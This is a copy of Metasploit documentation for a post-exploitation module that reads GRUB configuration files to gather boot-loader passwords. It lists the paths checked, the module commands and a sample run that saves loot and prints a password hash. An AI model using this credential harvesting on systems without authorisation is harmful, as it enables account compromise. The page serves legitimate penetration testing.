CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/multi/gather/grub_creds.md
Views: 1904

Gather GRUB Passwords

Reads all passwords from GRUB configuration files on UNIX-like machines.

Vulnerable Application

Any UNIX-like system with a shell or meterpreter session using GRUB.

Verification Steps

  1. Get a shell or meterpreter session on some host.

  2. Do: use post/multi/gather/grub_creds

  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this one.

  4. Do: run

  5. If the system has readable GRUB configuration files containing a password, they will be printed out.

Options

FILENAME

A string that can be used to specify an additional file to check after the usual places.

VERBOSE

A boolean that, when set, will provide more details on what is being checked. (Note: this option is defined elsewhere in metasploit, but this module can make use of it.)

Scenarios

There are many places where a user might place the password that GRUB uses, so inserting a password line into any of these locations will work without any additional configuration:

   /boot/grub/grub.conf
   /boot/grub/grub.cfg
   /boot/grub/menu.lst
   /boot/grub2/grub.cfg
   /boot/grub2/user.cfg
   /etc/grub.conf
   /etc/grub.d/*
   /etc/grub/grub.cfg
   /mnt/sysimage/boot/grub.conf
   /mnt/boot/grub/grub.conf
   /rpool/boot/grub/grub.cfg

Using a Metasploitable 2 VM (running Ubuntu 8.04), you can add the line password topscret to /boot/grub/menu.lst to easily see this module in action.

Meterpreter

Typical run against Ubuntu 18.04 LTS

msf5 exploit(handler) > use post/multi/gather/grub_creds
msf5 post(grub_creds) > set SESSION 1
SESSION => 1
msf post(grub_creds) > run

[*] Searching for GRUB config files..
[*] Reading /boot/grub/grub.cfg
[*] Reading /etc/grub.d/40_custom
[*] Reading /etc/grub.d/00_header
[*] Reading /etc/grub.d/20_linux_xen
[*] Reading /etc/grub.d/10_linux
[*] Reading /etc/grub.d/README
[*] Reading /etc/grub.d/01_users
[+] /etc/grub.d/01_users saved to /home/bcook/.msf4/loot/20191029041304_default_127.0.0.1_grub.config_755243.txt
[*] Reading /etc/grub.d/41_custom
[*] Reading /etc/grub.d/30_os-prober
[*] Reading /etc/grub.d/05_debian_theme
[*] Reading /etc/grub.d/30_uefi-firmware
[+] Found credentials

Grub Credential Table
=====================

Username             Password
--------             --------
putyourusernamehere  grub.pbkdf2.sha512.10000.CB9E1ED1050D0AFBC6EC3B75413FB288AD255B960C6DBA31C00A03AC286847DF8B1DEE167ED54316FD62EEAFE4A617959F90249849FBCB562AC27E68A6D59F90.E6AB5AE4B5E4EF375218A620A798002F5B38EE5F31B549A66AF5533A7931419BAC30E2305A95113F60BE116C9F3FE22126FE7768D095DE6B9BCDC55632400B52